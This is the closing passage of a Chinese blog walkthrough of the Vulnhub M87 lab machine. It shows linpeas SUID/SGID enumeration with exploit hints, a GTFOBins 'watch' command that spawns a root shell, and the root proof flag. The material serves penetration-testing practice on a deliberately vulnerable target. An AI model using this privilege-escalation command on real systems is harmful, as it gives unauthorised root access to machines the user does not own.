/usr/bin/su
/usr/bin/chsh
/usr/bin/ntfs-3g
/usr/bin/fusermount
/usr/bin/passwd
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/umount
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/cockpit/cockpit-session
/usr/lib/openssh/ssh-keysign
charlotte@M87:~$
将linpeas.sh脚本上传至目标主机,修改权限,并执行脚本
脚本输出结果,可以利用watch命令的SUID位进行提权,然后参考GTFOBINS的方法提权
╔═══════════════════╗
═════════════════════════════════════════╣ Interesting Files ╠═════════════════════════════════════════
╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
strings Not Found
strace Not Found
-rwsr-xr-- 1 root dip 378K Feb 20 2020 /usr/sbin/pppd ---> Apple_Mac_OSX_10.4.8(05-2007)
-rwsr-xr-x 1 root root 1.3M Sep 26 2020 /usr/sbin/exim4
-rwsr-sr-x 1 root root 27K May 31 2018 /usr/bin/watch
-rwsr-xr-x 1 root root 83K Jul 27 2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 53K Jul 27 2018 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 154K Feb 2 2020 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-sr-x 1 root root 489K Mar 15 2019 /usr/bin/rsync
-rwsr-xr-x 1 root root 63K Jan 10 2019 /usr/bin/su
-rwsr-xr-x 1 root root 44K Jul 27 2018 /usr/bin/chsh
-rwsr-xr-x 1 root root 151K Mar 21 2019 /usr/bin/ntfs-3g ---> Debian9/8/7/Ubuntu/Gentoo/others/Ubuntu_Server_16.10_and_others(02-2017)
-rwsr-xr-x 1 root root 35K Apr 22 2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 63K Jul 27 2018 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 51K Jan 10 2019 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 44K Jul 27 2018 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 23K Jan 15 2019 /usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
-rwsr-xr-x 1 root root 35K Jan 10 2019 /usr/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 10K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 50K Jul 5 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 19K Jan 15 2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-x--- 1 root cockpit-wsinstance 52K Oct 2 2020 /usr/lib/cockpit/cockpit-session (Unknown SUID binary)
-rwsr-xr-x 1 root root 427K Jan 31 2020 /usr/lib/openssh/ssh-keysign
╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
-rwxr-sr-x 1 root shadow 39K Feb 14 2019 /usr/sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 71K Jul 27 2018 /usr/bin/chage
-rwsr-sr-x 1 root root 27K May 31 2018 /usr/bin/watch
-rwxr-sr-x 1 root crontab 43K Oct 11 2019 /usr/bin/crontab
-rwxr-sr-x 1 root tty 35K Jan 10 2019 /usr/bin/wall
-rwsr-sr-x 1 root root 489K Mar 15 2019 /usr/bin/rsync
-rwxr-sr-x 1 root mail 19K Dec 3 2017 /usr/bin/dotlockfile
-rwxr-sr-x 1 root ssh 315K Jan 31 2020 /usr/bin/ssh-agent
-rwxr-sr-x 1 root shadow 31K Jul 27 2018 /usr/bin/expiry
-rwxr-sr-x 1 root tty 15K May 4 2018 /usr/bin/bsd-write
-rwxr-sr-x 1 root root 15K Nov 22 2019 /usr/bin/dotlock.mailutils
charlotte@M87:/tmp$ /usr/bin/watch -x sh -p -c 'reset; exec sh -p 1>&0 2>&0'
/usr/bin/watch -x sh -p -c 'reset; exec sh -p 1>&0 2>&0'
# id
id
uid=1000(charlotte) gid=1000(charlotte) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),1000(charlotte)
# cd /root
cd /root
# ls -alh
ls -alh
total 28K
drwx------ 4 root root 4.0K Nov 6 2020 .
drwxr-xr-x 18 root root 4.0K Nov 6 2020 ..
lrwxrwxrwx 1 root root 9 Nov 6 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwx------ 3 root root 4.0K Nov 6 2020 .gnupg
drwxr-xr-x 3 root root 4.0K Nov 6 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw------- 1 root root 1.2K Nov 6 2020 proof.txt
# cat proof.txt
cat proof.txt
MMMMMMMM MMMMMMMM 888888888 77777777777777777777
M:::::::M M:::::::M 88:::::::::88 7::::::::::::::::::7
M::::::::M M::::::::M 88:::::::::::::88 7::::::::::::::::::7
M:::::::::M M:::::::::M8::::::88888::::::8777777777777:::::::7
M::::::::::M M::::::::::M8:::::8 8:::::8 7::::::7
M:::::::::::M M:::::::::::M8:::::8 8:::::8 7::::::7
M:::::::M::::M M::::M:::::::M 8:::::88888:::::8 7::::::7
M::::::M M::::M M::::M M::::::M 8:::::::::::::8 7::::::7
M::::::M M::::M::::M M::::::M 8:::::88888:::::8 7::::::7
M::::::M M:::::::M M::::::M8:::::8 8:::::8 7::::::7
M::::::M M:::::M M::::::M8:::::8 8:::::8 7::::::7
M::::::M MMMMM M::::::M8:::::8 8:::::8 7::::::7
M::::::M M::::::M8::::::88888::::::8 7::::::7
M::::::M M::::::M 88:::::::::::::88 7::::::7
M::::::M M::::::M 88:::::::::88 7::::::7
MMMMMMMM MMMMMMMM 888888888 77777777
Congratulations!
You've rooted m87!
21e5e63855f249bcd1b4b093af669b1e
mindsflee
#
成功提权!
标签:INFO,06,22,M87,usr,靶机,root,x20,Vulnhub From: https://www.cnblogs.com/jason-huawen/p/16929346.html